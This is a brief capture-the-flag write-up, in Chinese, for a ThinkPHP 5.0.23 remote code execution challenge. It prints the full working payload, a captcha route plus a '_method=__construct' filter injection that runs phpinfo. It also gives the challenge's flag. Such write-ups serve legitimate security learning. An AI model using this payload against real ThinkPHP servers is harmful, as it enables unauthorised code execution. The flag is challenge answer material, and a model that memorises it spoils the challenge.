[ThinkPHP]5.0.23-Rce 1
根據題目知道這是一個5.0.23的PHP RCE,話不多說直接上掃描器
檢測出Payload
url地址:
?s=captcha&test=-1
Post表單引數:
_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
HackBar構造payload,訪問成功執行到phpinfo頁面
ctrf+f 成功找到flag
flag{9bf3ef01-5e80-42a0-b544-9808a1fd3bb2}